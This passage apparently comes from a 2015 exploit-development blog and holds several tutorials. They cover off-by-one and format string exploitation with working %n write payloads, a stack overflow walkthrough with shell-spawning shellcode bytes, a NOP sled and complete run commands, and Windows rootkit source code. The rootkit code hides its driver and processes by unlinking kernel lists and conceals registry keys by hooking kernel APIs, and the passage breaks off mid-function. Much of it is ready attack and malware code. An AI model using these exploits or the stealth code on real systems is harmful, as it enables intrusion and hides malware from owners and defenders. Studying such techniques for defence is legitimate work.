Tuesday, 23 June 2015 00:00

off by one buffer overflow

An off-by-one vulnerability is a type of buffer overflow in which the attacker can write only a single byte past the end of the buffer. It results from miscalculating the buffer length, typically by forgetting the terminating null byte. Below is an example of an off-by-one vulnerability in C:

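int get_user(char *user)
{
    char buf[1024];

    /* strlen() does not count the terminating null byte, so a
       1024-character string passes this check */
    if(strlen(user) > sizeof(buf))
        die("error: user string too long\n");

    /* copies 1024 characters plus the null byte: 1025 bytes */
    strcpy(buf, user);

    ...
}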

The Art of Software Security Assessment, Listing 5-3

Here strlen returns the length of the string without counting the terminating null character. When user is exactly 1024 characters long the check passes, and strcpy then copies 1025 bytes into buf, so the null byte lands in whatever sits directly above the buffer. If the compiler adds no padding and buf is the first local variable, that is the least significant byte of the saved EBP.

Compiler padding and variable reordering sometimes make an off-by-one vulnerability unexploitable. In other situations arbitrary code execution is still possible, even though a one-byte stack overflow gives us no direct control over the saved return address. Depending on how the compiler orders the variables, you may also be able to overwrite a specific variable that is vital to the application.

Exploiting Off-by-one buffer overflow vulnerability

Exploiting an off-by-one vulnerability depends on where the vulnerable buffer sits and on which other buffers the user controls. If the buffer lies directly below the saved EBP (it is the first local variable after the saved EBP on the stack), the off-by-one lets us change the least significant byte of the saved EBP (in the example above, to zero). When the vulnerable function returns, this altered value is loaded into EBP, and when the calling function later returns, its epilogue copies EBP into ESP. We therefore influence the caller's stack pointer at the moment it pops its return address, which gives us a way to control EIP. If the altered EBP points into a buffer we control, we can lay out that buffer so that it contains a custom address at the position where the saved EIP is expected. This custom address can point to another user-controllable buffer that contains the shellcode. When the second function returns with its ESP derived from the altered EBP, our code is executed.

 off by one stack buffer overflow exploit

Published in Exploit development

Exploit development for Format String vulnerability

A format string vulnerability results from incorrect use of the format functions in C. It is a favorite of many exploit writers because it provides an arbitrary memory overwrite, whereas a basic stack-based buffer overflow is limited to overwriting what lies above the buffer, such as the return address. Format string vulnerabilities are also less well known among developers, so they can be easier to find than a typical stack buffer overflow.

Format String vulnerability

Let’s first see one example of format string vulnerability and then explain what you can do with it:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
    char text[1024];

    strcpy(text, argv[1]);
    printf(text);   /* vulnerable: user input is used as the format string */
}

 

This code lets you supply an input that leads to an arbitrary memory read or write. To see the vulnerability, run the program with an argument such as:

./a.out AAAA%4\$x

 

When you run the program with this argument, the string is not printed as-is. Instead you get AAAA followed by a hexadecimal value.

This is because %4$x has a special meaning in a C printf format string. Consider this format string to understand the concept:

printf("3rd: %3$d, first: %1$05d\n", 10, 20, 30);

As you see, the first parameter of printf describes the formatting of the output. It tells printf to print the 3rd argument (%3$d) as a decimal after the text 3rd:, and then the first argument (%1$05d) after the text first: as a decimal zero-padded to 5 digits.

Can you guess what happens if this printf call did not have 3 arguments after the format string?

printf still tries to fetch the 3rd argument and prints whatever is on the stack at the position where that argument would have been (see Figure 1). In other words, it reads data that was placed on the stack before printf was called.

format string vulnerability stack layout

You may wonder why this works, since the 3rd argument seems to come after the arguments that were actually passed. Under the 32-bit C calling convention the caller pushes the arguments in reverse order, so the first argument ends up closest to the top of the stack. In the assembly version, printf reads its parameters like this:

mov parameter1, [sp+8] ; reading first parameter

mov parameter2, [sp+12]; reading second parameter

…

 

Note that the stack grows down, so adding a larger offset to the stack pointer reads further toward the bottom of the stack, that is, into the caller's data. If you still have trouble understanding the structure of the stack, I recommend reading this presentation.

Now it should be easy to see why the AAAA%4\$x string is a simple exploit for the format string vulnerability example above.

Arbitrary memory read exploit for format string vulnerability

If you want to read a specific memory address, a simple AAAA%4\$x exploit is not enough. You need to pass the address to read, and you need to make printf fetch that address as one of its arguments.

Let's solve the second problem first. If the address is somewhere on the stack, we can tell printf to read from it by treating it as a pointer. By changing AAAA%4\$x to AAAA%4\$s we tell printf that the 4th argument is a pointer to a string (%s). printf then reads from that address until it reaches the string termination character (the null character).

Now we need a way to place our address on the stack. If you experiment with different argument indexes in place of 4 in AAAA%4\$x, you will find one for which the printed value is 41414141, which is exactly AAAA in hexadecimal. This means printf is reading its argument from our own input, which lives on the stack: the program copies it into text, a local buffer of main, and main's arguments are also stored near the bottom of the stack. So you just need to pass your address instead of AAAA. This is a modified version of the exploit that reads from the memory address bffffdd7:

./a.out  $(printf "\xd7\xfd\xff\xbf")%4\$s

 

Arbitrary memory write exploit for format string vulnerability

Writing to a memory address is possible through the %n format parameter. %n tells printf to store the number of bytes written so far into the integer that the corresponding pointer argument points to. By controlling the number of bytes written so far and passing the address to write to, we can write to a memory address of our choice. Very robust exploits can be built with this simple method, but modern toolchains have restricted it: for example, Microsoft's C runtime disables %n by default, and glibc built with _FORTIFY_SOURCE=2 rejects %n in a format string stored in writable memory. Your chances of an arbitrary write through a format string vulnerability are therefore much lower today. Below is an example of a format string exploit that writes to memory:

./a.out $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\x08" . "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%98x%4\$n%139x%5\$n%258x%6\$n%192x%7\$n

 

 

The intention of this exploit may seem overwhelming at first, but it becomes clear once you take it apart. The first 4 strings passed to the perl print function are the 4 addresses we want to overwrite. The values to be written to these addresses are, in hexadecimal:

72

fd

ff

bf

 

If you take the little-endian byte order of the system into account, you can probably see why we want to write these values: once written, they form the 32-bit value bffffd72. We want to write bffffd72 to the address 08049794. That address points to a 4-byte memory chunk, and we write the value one byte at a time, because bffffd72 is a huge number and making printf output that many bytes in order to write it with a single %n is impractical and would most likely crash the program.

To produce those 4 values, all we control is how many bytes have been written so far. For example, look at the %98x part of the exploit. It tells printf to read a value from the stack and print it in hexadecimal, padded to a width of 98 bytes. Up to %4\$n, the 4 * 4 address bytes plus these 98 bytes have been written, so %4\$n writes 114, or 0x72, to the address 08049794. After that, %139x adds 139 to the 114, so the next value written is 253, or 0xfd, which goes to 08049795. %258x then brings the count to 511 (0x1ff) and %192x brings it to 703 (0x2bf). Each %n stores the whole 4-byte count, so only its low byte (0xff, then 0xbf) matters for the target address, and the last write also spills into the three bytes after 08049797.

Conclusion

You have seen how an arbitrary memory read or write is possible using a format string vulnerability. You may think this is not as devastating as a stack buffer overflow, but an arbitrary memory write can lead to a more robust code execution exploit than a stack buffer overflow. Be creative and think of ways to use it to spawn a shell or execute a command. To name one, you can pass your shellcode instead of the 98 padding spaces at the beginning and then write the address of the beginning of the shellcode to a function pointer.

Buffer overflow exploit development

Buffer overflow exploits leverage a type of software bug in which the buffer being read or written is not properly bounds-checked. Normally, input larger than the buffer leads to a fault or crash. The art of exploit development is to craft data that not only avoids crashing the program but also leads to arbitrary command execution. A hacking experience such as the one in my Remote Hacking with Metasploit article shows how devastating a buffer overflow exploit can be, but you are not a real hacker until you are armed with the knowledge of exploit development.

What is a basic buffer overflow vulnerability?

There are tons of buffer overflow exploit tutorials and even books that teach the basic concepts. A good example is this presentation on the basic concepts of buffer overflows from syssec. I strongly recommend reading that PowerPoint presentation first and then the rest of this exploit development tutorial. From here on I assume that you have read it or that you have a basic understanding of what a buffer overflow is and why it can lead to arbitrary code execution.

Which programming languages should I know for exploit development?

To identify a large share of buffer overflow vulnerabilities through static code analysis you should be experienced in C and C++, and in particular comfortable with pointers. Besides C, a deep knowledge of assembly is required, both for analysis and for shellcode development (don't worry, you will learn what shellcode is by the end of this article). Writing the exploit itself does not require any particular programming language, although developing exploits with Metasploit is strongly recommended. Finally, a scripting language such as Python or Perl can save you a lot of time, first for fuzzing to detect the buffer overflow and then for writing a snippet that runs the exploit automatically.

Buffer overflow example

In my Buffer overflow example article I introduced several buffer overflow examples in C. Here is a basic example of an unchecked buffer that can lead to a buffer overflow exploit:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
    int value = 5;
    char buffer_one[8], buffer_two[8];

    strcpy(buffer_one, "one"); /* put "one" into buffer_one */
    strcpy(buffer_two, "two"); /* put "two" into buffer_two */

    printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
    printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
    printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

    printf("\n[STRCPY] copying %zu bytes into buffer_two\n\n", strlen(argv[1]));
    strcpy(buffer_two, argv[1]); /* copy first argument into buffer_two (no bounds check) */

    printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
    printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
    printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);
}

 

The Art of Exploitation - overflow_example.c

Here buffer_two is 8 bytes long, but no size check is performed before argv[1] is copied into it. This means you can input 16 or more bytes to cause a buffer overflow. If you compile and run this small program you will see the effect: buffer_one is overwritten by the extra bytes. Surprised? Don't be. If you have read the basic concepts behind buffer overflows, you know that the stack grows down, which on this setup means that a variable declared later (here buffer_two) is placed at a lower address than the one declared before it (buffer_one), so writing past the end of buffer_two runs into buffer_one. If you input an even larger string, the program crashes, usually with a segmentation fault. The goal of exploit development (for buffer overflows specifically) is to leverage this bug and receive a shell or command prompt instead of a segmentation fault or program crash. Be patient, we will get to that point. But first let's review the requirements for exploit development.

Exploit experimentation operating system requirement

Ten years ago, exploit writing was much easier than it is now, because most of today's protections against buffer overflows did not exist. If you are eager to know how simple vulnerable code can be exploited on modern operating systems such as Windows 7 or Windows 8, be patient and read the articles in the Exploitation category, especially the Bypass ASLR, DEP and Stack Canary protections article. For now, to understand the concept, download an old OS such as Ubuntu 7.04 (Feisty Fawn) that has little to no protection. On such a system you can see that exploitation is feasible, learn the basic exploit development concepts, and then gradually build up your knowledge to target modern operating systems.

Why can buffer overflows lead to arbitrary code execution?

To answer this question we must know how a program is executed. A program is a collection of functions, and depending on the program's logic, the main function calls other functions. main is the entry point of an application: when you launch an executable, the statements in main are executed one by one. A statement can be a call to a function, and the called function can in turn call another function. Calls can be nested to any depth, so how does the machine keep track of which instruction to execute when a function finishes? A fast way to do this is to store the address of the next instruction in the same place as the function's variables and parameters. That place is the stack, and to see its structure I again recommend reading this presentation. The “next instruction address” is stored above all of the function's local variables, at a higher address. This means any buffer in a function that is vulnerable to overflow sits beneath the saved Extended Instruction Pointer (EIP). In other words, an overflow of any local variable in a function can potentially overwrite the next instruction address, the saved EIP, on the stack.

How can we successfully overwrite the EIP?

If you have played with the buffer overflow example, you have seen that making the input longer eventually crashes the program. When the crash happens, you have most likely overwritten the saved EIP. For successful exploitation, however, you need to know exactly how many bytes it takes to reach the saved EIP. I introduce two methods here: first using a debugger, and second by experimentation.

Finding the exact bytes to overwrite the EIP using debugger

In this method we know the value of EIP and we just want to see how far it is located from our buffer. Let’s modify the buffer overflow example a little bit:

#include <stdio.h>
#include <string.h>

void copy_buffer(char buffer[], char argv[]) {
    strcpy(buffer, argv);
}

int main(int argc, char *argv[]) {
    int value = 5;
    char buffer_one[8], buffer_two[8];

    strcpy(buffer_one, "one"); /* put "one" into buffer_one */
    strcpy(buffer_two, "two"); /* put "two" into buffer_two */

    printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
    printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
    printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

    printf("\n[STRCPY] copying %zu bytes into buffer_two\n\n", strlen(argv[1]));
    copy_buffer(buffer_two, argv[1]); /* copy first argument into buffer_two */

    printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
    printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
    printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);
}

The only difference is that we use the copy_buffer function to copy the program argument. We know that the next statement after the copy_buffer call is line 22 (the first [AFTER] printf), so when copy_buffer finishes, execution should return to the address of that instruction. By setting a breakpoint on the copy_buffer call in main and examining the address of the instruction that follows it, we can then locate that address on the stack inside copy_buffer. The simplest method is to set another breakpoint on line 6 (the closing brace of copy_buffer), just before the function returns. Then we examine the stack (64 bytes or more) and see where the return address and our input are placed. The distance between these two addresses is the exact number of bytes needed to reach the saved EIP.

Finding the exact bytes to overwrite the EIP by experimentation

The goal here is to automate running the program with inputs of different lengths and to see when it crashes. A Python script can easily do this, but here I show a Linux Bash loop instead:

$ for i in $(seq 1 100)
> do
> echo Trying offset $i
> ./a.out $(perl -e "print 'AAAA'x$i")
> done

The first iteration that ends in a segmentation fault gives you the offset, counted in 4-byte words. It is worth confirming in a debugger that EIP really holds 0x41414141 at that point.

After finding the offset, repeating AAAA that many times overwrites the saved EIP with the value 0x41414141.

How can we execute our arbitrary command by overwriting the EIP?

Overwriting the saved EIP with a valid address of your choice means redirecting execution to code you want. You may immediately ask: redirect execution where? Remember that you are writing to a buffer. So you are not only overflowing the buffer to overwrite the saved EIP on the stack, you are also writing your code into that buffer. The only remaining barrier is finding the address of that buffer, so that you can write this address over the saved EIP and have the program execute the code you supplied as input. This code is known as SHELLCODE.

What is a NOP slide?

Finding the address of the buffer where you inject the SHELLCODE is not that easy. Many factors, such as environment variables and the program name, can shift the address of the buffer between runs. Moreover, the address must point exactly to the beginning of the SHELLCODE. If any factor changes the address even by one byte, the SHELLCODE is not executed correctly and the program crashes. To reduce the need for an exact return address (the address of the buffer), we place NOP instructions in front of the SHELLCODE. When the CPU sees a NOP instruction it simply does nothing and moves on. So if the address shifts, it still points somewhere within the NOP instructions (known as a NOP slide or NOP sled), and the CPU executes NOPs one after another until it reaches the SHELLCODE. The layout of our exploit is shown in Figure 1:

layout of a buffer overflow exploit

Figure 1

 How to find the return address that points to the SHELLCODE?

The quick answer is to use a debugger to find the address of the buffer that holds the input. When you audit open source code or a simple example like the one in this tutorial, you can easily find the address by using the variable name in the debugger.

In Linux, gdb is the best choice, and this task is as easy as attaching to the process:

gdb -q --pid=[PROCESS-ID] --symbols=[OUTPUT-FILE]

The process ID can be retrieved with the ps command, and the output file is whatever name you gave when compiling with gcc. After attaching to the process you can get the address of the buffer with this command:

x/x [VARIABLE-NAME]

 

In Windows, it is even easier using WinDbg or Immunity Debugger:

  1. First place your .pdb file in a known location and point to it using this menu:

File-->Symbol File path

  1. And then you attach to the process using this menu:

File-->Attach to process

  1. And then view the variable address using:

View-->Watch

  1. Here you type the name of your variable.

If you do not have the symbol file or the source code, don't worry. You can search memory for your input and retrieve the address of the beginning of the buffer. For example, in WinDbg with mona.py installed, finding an AAAAAAAAA input pattern is as easy as:

!mona find -type asc -s "AAAAAAAAA"

SHELLCODE

Figure 2 shows a SHELLCODE:

SHELLCODE

Figure 2

These bytes, if executed, spawn a shell for you. To be executed, they must be injected into the program together with the preceding NOP sled. One important factor for successful exploitation is the length of the vulnerable buffer. You can overflow and overwrite the saved EIP even with an 8-byte buffer such as the one in our buffer overflow example, though that takes a lot of experience and knowledge. We want to place our NOP sled + SHELLCODE in the buffer, so the buffer should be at least that big. For this reason we modify our buffer overflow example like this:

#include <string.h>

int main(int argc, char *argv[]) {
    int value = 5;
    char buffer_one[8], buffer_two[250];

    strcpy(buffer_two, argv[1]); /* copy first argument into buffer_two */
}

 

Now our vulnerable buffer is big enough that we can input data containing our NOP sled + SHELLCODE + repeated return address.

Building the exploit

So far you have seen a program that is vulnerable to a buffer overflow exploit. You learned that a vulnerable buffer allows you to overwrite the return address on the stack, and that you can deliberately overwrite the return address so that it points to SHELLCODE you placed in the buffer. Finally, you learned how to find the address of the SHELLCODE in the buffer and how to add NOPs so that the address does not need to be exact. Now it is time to see how we build an exploit using this information.

  1. In Linux we build the NOP sled like this:
$(perl -e 'print "\x90"x200')

 

This builds 200 consecutive NOP instructions for us.

  1. Then we build our SHELLCODE like this:
export SHELLCODE=$(printf "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80")

 

The string is the hexadecimal representation of the machine code that spawns a shell for us.

  1. Finally, assuming the address of the vulnerable buffer is 0xbffff5c0, we repeat the address 0xbffff624 10 times. That's right, we do not repeat the buffer address itself but 0xbffff5c0 + 100. 100 bytes past the start of the buffer we are in the middle of the NOP instructions, so it is a safe guess even if the buffer address shifts somewhat. Why 10 times? That depends on the buffer length (here 250), the NOP sled size and the distance from the buffer to the saved EIP. Remember that the goal is to overflow the buffer and overwrite the saved EIP, so if 10 does not work for you, run the Bash loop again to find the offset and calculate the number of repeated return addresses:
$(perl -e 'print "\x24\xf6\xff\xbf"x10')

 

Did you notice? The address bytes are in reverse order. That's because the 32-bit Intel architecture that Ubuntu 7.04 (Feisty Fawn) runs on here is little-endian, which means the least significant byte is stored at the lowest address.

  1. Finally our exploit can be run:
./a.out $(perl -e 'print "\x90"x200')$(echo $SHELLCODE)$(perl -e 'print "\x24\xf6\xff\xbf"x10')

 

Or the exploit can be saved in an environment variable like this:

export EXPLOIT="$(perl -e 'print "\x90"x200')$SHELLCODE$(perl -e 'print "\x24\xf6\xff\xbf"x10')"

 

You can also save the exploit to a file:

echo $EXPLOIT > example_exploit

 

Or you can run the exploit later with:

./a.out $(echo $EXPLOIT)

 

Or:

./a.out $(cat example_exploit)

 

 

Thursday, 04 June 2015 00:00

Rootkit concealment part 2

In my previous article, Rootkit concealment part 1, I talked about methods for hiding registry keys and directories. This article discusses methods for hiding drivers and processes. In both cases the logic is the same, although the kernel data structures to alter are different. The overall idea is to start from the process or driver data the OS hands us and use it to find the linked list with which the OS keeps track of running processes or loaded drivers. After locating that linked list, we modify it so that our process or driver is removed from the list.

Driver hiding C++ source code

In the DriverEntry function of the driver, the OS passes us a PDRIVER_OBJECT. Using this object we can locate the DRIVER_DATA linked list of drivers. This data structure uses the typical forward and backward pointers to reach the next and previous drivers. Hiding the driver (in this case the rootkit) comes down to modifying the links of the entries before and after our driver object so that they point past it. Figure 1 shows the concept:

driver and process hiding

Figure 1

The source code to do this is:

NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )
{
    DRIVER_DATA* driverData;
    ...

    // Hide this driver
    driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));
    if( driverData != NULL )
    {
        // unlink this driver entry from the driver list
        *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;
        driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;
    }
    ...

    return STATUS_SUCCESS;
}

 

Process hiding C++ source code

As discussed at the beginning of this article, the idea behind driver hiding and process hiding is the same, but there are design and implementation differences in process hiding. The rootkit base itself is a driver, but there may be other executables shipped with the rootkit that need to be hidden. To hide itself, an executable calls the driver and passes its process ID. Here is the code that calls the driver and passes the process ID:

control.processId = GetCurrentProcessId();
deviceHandle = CreateFile( GHOST_DEVICE_OPEN_NAME,
    GENERIC_READ | GENERIC_WRITE,
    0,
    NULL,
    OPEN_EXISTING,
    FILE_ATTRIBUTE_NORMAL,
    NULL);

if( DeviceIoControl(deviceHandle,
    GHOST_HIDE_COMMAND,
    &control,
    sizeof(control), // input
    (PVOID)&control,
    sizeof(control), // output
    &status,
    NULL ) )
    printf ("MyDeviceDriver hiding this process (0x%x).\n",
        control.processId );

 

The driver receives this call in its dispatch routine (because in the DriverEntry function we set OnDispatch to process all requests to our driver). The driver then finds the process linked list (KPControlBlock) using the PsGetCurrentProcess API plus an offset (the offset depends on the OS version), locates the process entry in the list using the process ID that was passed in, and modifies the linked list to hide the process.

 

NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )
{
    DRIVER_DATA* driverData;
    ...

    // Route standard I/O through our dispatch routine
    for(loop = 0; loop < IRP_MJ_MAXIMUM_FUNCTION; loop++)
        pDriverObject->MajorFunction[loop] = OnDispatch;
    ...

    return STATUS_SUCCESS;
}

// Process I/O
NTSTATUS OnDispatch( PDEVICE_OBJECT DeviceObject, PIRP Irp )
{
    PIO_STACK_LOCATION irpStack;
    ...
    // Get the IRP stack
    irpStack = IoGetCurrentIrpStackLocation (Irp);
    ...
    switch (irpStack->MajorFunction)
    {
        case IRP_MJ_DEVICE_CONTROL:
            status = OnDeviceControl( irpStack->FileObject, TRUE,
                inputBuffer, inputBufferLength,
                outputBuffer, outputBufferLength,
                ioControlCode, &Irp->IoStatus, DeviceObject );
            break;
    }
    ...
}

// Process commands from external applications
NTSTATUS  OnDeviceControl( PFILE_OBJECT FileObject, BOOLEAN Wait,
    PVOID InputBuffer, ULONG InputBufferLength,
    PVOID OutputBuffer, ULONG OutputBufferLength,
    ULONG IoControlCode, PIO_STATUS_BLOCK IoStatus,
    PDEVICE_OBJECT DeviceObject )
{
    ...

    switch ( IoControlCode )
    {
    ...

        case GHOST_HIDE_COMMAND:
            if ( InputBufferLength >= sizeof(GHOST_IOCTLDATA) )
            {
                pControlData = (GHOST_IOCTLDATA*)InputBuffer;
                eProcess = findProcess( pControlData->processId );
                if( eProcess != 0 )
                {
                    // Hide the process
                    processList = (LIST_ENTRY *)(eProcess + listOffset );
                    if( processList && processList->Flink && processList->Blink)
                    {
                        *((DWORD *)processList->Blink) = (DWORD) processList->Flink;
                        *((DWORD *)processList->Flink + 1) = (DWORD) processList->Blink;
                        processList->Flink = (LIST_ENTRY *)&(processList->Flink);
                        processList->Blink = (LIST_ENTRY *)&(processList->Flink);
                    }
                    else
                    {
                        DbgPrint("comint32: Error finding process 0x%x",
                            pControlData->processId);
                    }
                }
                else
                {
                    DbgPrint("comint32: Could not find process 0x%x",
                        pControlData->processId);
                }
            }
            return IoStatus->Status;

        default:
            IoStatus->Information = 0;
            IoStatus->Status = STATUS_NOT_SUPPORTED;
            return IoStatus->Status;
    }
    return STATUS_SUCCESS;
}

DWORD findProcess ( DWORD targetProcessId )

{

                int loop = 0;

                DWORD eProcess;

                DWORD firstProcess;

                DWORD nextProcess;

                PLIST_ENTRY processList;

 

                if ( targetProcessId == 0 )

                                return 0;

 

                // Get the process list

                eProcess = (DWORD)PsGetCurrentProcess();

                // Traverse the process list

                firstProcess = *((DWORD*)(eProcess + (listOffset - 4))); //The process list is in eProcess + listOffset but here we acquired the first process's ID

                nextProcess = firstProcess;

                for(;;)

                {

                                if(targetProcessId == nextProcess)

                                {

                                                // found the process

                                                break;

                                }

                                else if( loop && (nextProcess == firstProcess) ) //loop ensures that we have advanced at least once and are not still at the starting entry

                                {

                                                // circled without finding the process

                                                eProcess = 0;

                                                break;

                                }

                                else

                                {

                                                // get the next process

                                                processList = (LIST_ENTRY*)(eProcess + listOffset);

                                                if( processList->Flink == 0 )

                                                {

                                                                DbgPrint ("comint32: findProcess no Flink!");

                                                                break;

                                                }

                                                eProcess = (DWORD)processList->Flink;

                                                eProcess = eProcess - listOffset; //This and the next line is suspicious! why not just using eProcess - 4?! Anyway from the Flink which is the pointer to the process's list we retrieve the process's ID

                                                nextProcess = *((DWORD*)(eProcess + (listOffset - 4)));

                                }

                                loop++;

                }

 

                return eProcess;

}

 

The complete rootkit source code and a compiled version of two rootkit concealment parts can be downloaded here.

Published in Rootkit development
Thursday, 04 June 2015 00:00

Rootkit concealment part 1


Rootkit concealment is a broad topic, and this article and the next can only touch on it. Removing the traces of malware such as a rootkit means hooking or altering many OS kernel functions and data structures. A complete solution may also require removing the installation files and any logs created during installation. This first part introduces methods for hiding registry keys and directories. Rootkit concealment part 2 explains methods for hiding the driver and the process.

In my kernel hooks article I explained how to modify the system service descriptor table in order to place a kernel hook. In the User mode hooking article I introduced one use of kernel hooks: manipulating a process's functions through ZwMapViewOfSection. This article hooks four more kernel APIs.

Registry hiding c++ source code

One of the traces that malware such as a rootkit leaves is in the registry under the “Services” key. The Services key keeps a record for every service and driver installed on the system. To hide the rootkit from the user (and the system) you must alter the mechanism the OS uses to retrieve registry keys. To do that you must hook ZwOpenKey, ZwQueryKey and ZwEnumerateKey. ZwOpenKey opens and loads a registry key. ZwQueryKey returns information about a key, the most useful part of which is the number of its subkeys. ZwEnumerateKey is used to get one subkey of a key. By hooking these functions we manipulate the registry retrieval mechanism so that it never returns information about the hidden keys.

The registry is essential to the OS because the OS keeps its configuration and persistent data there. It is organized as a tree: there is a root key, every other key is a subkey of some parent, and so on down to the leaves. When the user opens the registry editor to see what is under the Services key, the editor first asks the OS to open the Services key. It then queries the number of subkeys and iterates over that count, retrieving each subkey by its index. To hide the key of our rootkit driver, we alter ZwQueryKey to report one subkey fewer than the real number, and when the registry editor asks for the index of our hidden key we return the next key instead.

To clarify the concept, let’s examine an example. Suppose the Services key has 12 subkeys and we want to hide two of them. First we tell the registry editor that there are 10 subkeys, and then, when it queries the subkeys by index, we return every record except the hidden ones. Doing this is a little tricky. The hidden keys could be at any index, and once we tell regedit that there are 10 records it queries the OS kernel for indexes 1 to 10. (The example counts from 1 for readability; the real indexes passed to ZwEnumerateKey start at 0.) Suppose the index of our first hidden key is 6. If we let regedit query index 6, nothing is hidden, so when regedit asks for 6 we return 7. Suppose the other hidden key is at index 10. This case is a little more complex. If regedit asks for 10 we can return 11, but what do we return when it asks for 9? Because we returned 7 for 6, we have to return the requested index + 1 for every index after 6; if we returned 7 for 7, for example, the same key would be shown twice, which causes other problems. But if we return 9 + 1 = 10 here, we unintentionally expose the hidden key. Therefore we have to return 11 for 9 and then 12 for 10.

Now that you have an overview of what is going to happen, let’s go into the details. To return those fake indexes and hide our registry keys we must build a tree data structure that keeps track of keys and their new indexes. The data structure is this:
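The renumbering in this example can be checked with a small user-mode model. The sketch below is not part of the rootkit and makes no kernel calls; it only reproduces the arithmetic, using the 1-based positions from the example. The function name build_visible_map and its parameters are made up for illustration.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper, for illustration only.
 * total:   number of real entries, numbered 1..total as in the example
 * hidden:  1-based positions that must be skipped
 * nhidden: number of elements in hidden
 * map:     caller-provided array with at least total + 1 slots; on return,
 *          map[i] (for i >= 1) is the real position reported when position
 *          i is requested
 * returns: the number of visible entries */
size_t build_visible_map(size_t total, const size_t *hidden,
                         size_t nhidden, size_t *map)
{
    size_t visible = 0;

    assert(map != NULL);
    for (size_t real = 1; real <= total; real++) {
        int skip = 0;

        /* is this real position one of the hidden ones? */
        for (size_t h = 0; h < nhidden; h++) {
            if (hidden[h] == real) {
                skip = 1;
                break;
            }
        }
        /* visible entries are packed into consecutive positions */
        if (!skip)
            map[++visible] = real;
    }
    return visible;
}
```

With 12 entries and positions 6 and 10 hidden, the function reports 10 visible entries and maps 6 to 7, 9 to 11 and 10 to 12, which matches the walk-through above.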

// key data structures

typedef struct _KEY_HANDLE //This and the next structures are just for us to keep track of the hidden keys and return crafted values from it to the system.

{

                HANDLE               handle;

                PVOID   keyData;

                struct _KEY_HANDLE *previous;

                struct _KEY_HANDLE *next;

} KEY_HANDLE;

typedef struct _REG_KEY_DATA

{

                ULONG subkeys;

                SUBKEY_DATA* subkeyData;

} REG_KEY_DATA;

 

typedef struct _SUBKEY_DATA

{

                ULONG subkeyIndex;

                ULONG newIndex;

                struct _SUBKEY_DATA *next;

} SUBKEY_DATA;

 

To create these new indexes for the Services key we hook ZwOpenKey with NewZwOpenKey. We only build our tree for the subkeys of “Services”; if you want to hide other keys you must build the tree data for those keys too. Remember that building such a tree structure is time-consuming, so being as selective as possible is essential. As a matter of fact, in rootkit development you should always do as little as required:

// create an index that skips hidden subkeys

// when the parent key is \\Services

NTSTATUS NewZwOpenKey( OUT PHANDLE KeyHandle, //In this hooked function we just create our own view of the registry keys and their indexes (crafted to hide the keys we want) and keep it in the global variable g_keyList.

                IN ACCESS_MASK DesiredAccess,

                IN POBJECT_ATTRIBUTES ObjectAttributes )

{

    int status;

 

                status = OldZwOpenKey(

                                KeyHandle,

                                DesiredAccess,

                                ObjectAttributes );     

 

                if( status == STATUS_SUCCESS )

                {

                                // get the name of the key

                                PUNICODE_STRING pKeyName = NULL;

                                UNICODE_STRING servicesString = { 0 };

                                RtlInitUnicodeString( &servicesString, L"Services" );

                                GetKeyName( *KeyHandle, &pKeyName );

                                // create special index for the Services key                                                                                                         

                                if( pKeyName )

                                {

                                                // Using IsSameFile as IsSameKey function

                                                if( IsSameFile( &servicesString, pKeyName ) ) // Using IsSameFile because a registry key name is much like a full file path. [HKEY_LOCAL_MACHINE]\CurrentControlSet\....\Alex

                                                {

                                                                DbgPrint("comint32: found g_servicesKey");

                                                                CreateHiddenKeyIndices( *KeyHandle );

                                                }

                                                ExFreePool( pKeyName );

                                }

                }

 

                return status;

}

 

 

CreateHiddenKeyIndices builds the data structure described above. It enumerates the subkeys of KeyHandle and compares each name with the name of our rootkit driver and with two other made-up values (defined just to show the concept). Each time it finds one of the hidden keys it increments offset. Every subkey is then recorded with a new index of realIndex + offset, so the new index equals the real index until the first hidden key is reached.

// create a key list with index data that skips hidden keys

int CreateHiddenKeyIndices( HANDLE hKey )

{

                int status;

                int index = 0;

                int offset = 0;

                int visibleSubkeys = 0;

    PVOID pInfoStruct;

    ULONG infoStructSize;

    ULONG resultLength;

                KEY_HANDLE* pKeyHandle = 0;

 

                pKeyHandle = FindKeyHandle( hKey );

 

                // remove old sub key data if it exists

                if( pKeyHandle )

                                FreeKeyHandle( hKey ); //This function does not free the memory, it just removes the hKey from the g_keyList global list by changing the previous and the next pointer

                pKeyHandle = AllocateKeyHandle( hKey ); //Allocate a KEY_HANDLE structure and set the hKey for its HANDLE

               

                // size must be larger than any of the info structures

                infoStructSize = 256;

                pInfoStruct = ExAllocatePool( PagedPool, infoStructSize );

 

    if ( pInfoStruct == NULL )

        return -1;

 

                // enumerate subkeys

                for(;;) //this loops goes over all of the subkeys possible and break if status returned by ZwEnumerateKey is not success (No more sub keys)

                {

